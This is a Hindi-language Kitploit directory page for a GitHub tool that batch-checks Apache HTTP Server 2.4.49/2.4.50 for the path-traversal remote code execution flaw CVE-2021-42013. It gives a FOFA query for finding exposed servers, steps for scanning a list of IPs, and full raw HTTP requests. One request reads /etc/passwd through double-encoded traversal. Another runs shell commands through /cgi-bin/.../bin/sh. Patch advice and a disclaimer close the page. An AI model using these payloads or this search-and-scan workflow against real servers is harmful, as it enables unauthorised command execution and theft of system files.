Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-42013-Apache-RCE-Poc-Exp — Apache दूरस्थ कोड निष्पादन (CVE-2021-42013) बैच डिटेक्शन टूल: Apache HTTP Server अमेरिका के Apache फाउंडेशन द्वारा विकसित एक ओपन-सोर्स वेब सर्वर है। यह सर्वर तेज़, विश्वसनीय और सरल API के माध्यम से विस्तार योग्य है। यह पाया गया कि Apache HTTP Server 2.4.50 में CVE-2021-41773 के लिए किया गया सुधार पर्याप्त नहीं था। हमलावर पथ ट्रैवर्सल हमले का उपयोग करके URL को एलियास जैसे निर्देशों द्वारा कॉन्फ़िगर की गई निर्देशिकाओं के बाहर स्थित फ़ाइलों पर मैप कर सकते हैं। यदि उन निर्देशिकाओं के बाहर की फ़ाइलें सामान्य डिफ़ॉल्ट कॉन्फ़िगरेशन "Require all denied" द्वारा सुरक्षित नहीं हैं, तो ये अनुरोध सफल हो सकते हैं। यदि इन एलियास पथों के लिए CGI स्क्रिप्ट भी सक्षम हैं, तो यह दूरस्थ कोड निष्पादन की अनुमति दे सकता है। यह समस्या केवल Apache 2.4.49 और Apache 2.4.50 को प्रभावित करती है, पुराने संस्करणों को नहीं। | Kitploit
उपकरण/GitHubGitHub/asaotomo/cve-2021-42013-apache-rce-poc-exp
टोहीभेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubasaotomo/cve-2021-42013-apache-rce-poc-exp

CVE-2021-42013-Apache-RCE-Poc-Exp

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

रिपॉजिटरी देखें
102114 साल पहलेअभी तक समीक्षित नहीं

Apache दूरस्थ कोड निष्पादन (CVE-2021-42013) बैच डिटेक्शन टूल: Apache HTTP Server अमेरिका के Apache फाउंडेशन द्वारा विकसित एक ओपन-सोर्स वेब सर्वर है। यह सर्वर तेज़, विश्वसनीय और सरल API के माध्यम से विस्तार योग्य है। यह पाया गया कि Apache HTTP Server 2.4.50 में CVE-2021-41773 के लिए किया गया सुधार पर्याप्त नहीं था। हमलावर पथ ट्रैवर्सल हमले का उपयोग करके URL को एलियास जैसे निर्देशों द्वारा कॉन्फ़िगर की गई निर्देशिकाओं के बाहर स्थित फ़ाइलों पर मैप कर सकते हैं। यदि उन निर्देशिकाओं के बाहर की फ़ाइलें सामान्य डिफ़ॉल्ट कॉन्फ़िगरेशन "Require all denied" द्वारा सुरक्षित नहीं हैं, तो ये अनुरोध सफल हो सकते हैं। यदि इन एलियास पथों के लिए CGI स्क्रिप्ट भी सक्षम हैं, तो यह दूरस्थ कोड निष्पादन की अनुमति दे सकता है। यह समस्या केवल Apache 2.4.49 और Apache 2.4.50 को प्रभावित करती है, पुराने संस्करणों को नहीं।

साझा करें

भेद्यता का नाम

Apache रिमोट कोड एक्जीक्यूशन (CVE-2021-42013)

भेद्यता विवरण

Apache HTTP Server अमेरिकी Apache फाउंडेशन का एक ओपन-सोर्स वेब सर्वर है। यह तेज़, विश्वसनीय और सरल API के माध्यम से विस्तार योग्य है। Apache HTTP Server 2.4.50 में CVE-2021-41773 के लिए किए गए सुधार को अपर्याप्त पाया गया। हमलावर पथ ट्रैवर्सल हमले का उपयोग करके URL को उन फ़ाइलों पर मैप कर सकते हैं जो उपनाम निर्देशों द्वारा कॉन्फ़िगर किए गए निर्देशिका के बाहर हैं। यदि उन निर्देशिकाओं के बाहर की फ़ाइलें सामान्य डिफ़ॉल्ट कॉन्फ़िगरेशन "सभी को अस्वीकार करें" द्वारा सुरक्षित नहीं हैं, तो ये अनुरोध सफल हो सकते हैं। यदि इन उपनाम पथों के लिए CGI स्क्रिप्ट भी सक्षम हैं, तो यह रिमोट कोड निष्पादन की अनुमति दे सकता है। यह समस्या केवल Apache 2.4.49 और Apache 2.4.50 को प्रभावित करती है, पुराने संस्करणों को नहीं।

प्रभावित संस्करण

Apache HTTP Server 2.4.49

Apache HTTP Server 2.4.50

FOFA सिंटैक्स

server="Apache/2.4.49" || server="Apache/2.4.50"

उपयोग विधि

1. जांच के लिए तैयार IP पतों को ip.txt फ़ाइल में डालें
2. python3 check.py चलाएँ
चित्र

POC

GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
चित्र

EXP

GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: vuglfocus.fofa.so:55493
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ZMSESSID=fcnisfo6rj1snid6e5r27kj1n0; zmSkin=classic
Connection: close
Content-Length: 57

echo Content-Type: text/plain; echo;ls /

चित्र

सुधार सुझाव

वर्तमान में ये भेद्यताएं ठीक कर दी गई हैं। भेद्यता की गंभीरता को देखते हुए, प्रभावित उपयोगकर्ताओं को तुरंत Apache HTTP Server 2.4.51 (7 अक्टूबर को जारी) या उच्च संस्करण में अपग्रेड करने की सलाह दी जाती है।

डाउनलोड लिंक:

https://httpd.apache.org/download.cgi#apache24

सावधानियां

यह उपकरण केवल सुरक्षा परीक्षकों को स्वयं सुरक्षा जांच करने के लिए प्रदान किया गया है। उपयोगकर्ता द्वारा दुरुपयोग से होने वाले सभी परिणाम लेखक से संबंधित नहीं हैं। उपयोगकर्ताओं को स्थानीय कानूनों का पालन करना चाहिए। यह प्रोग्राम व्यावसायिक उपयोग के लिए नहीं है, केवल सीखने और आदान-प्रदान के लिए है।

147206848-6090876d-d029-4ffd-a6a8-ee4600071404
टूल डाउनलोड करें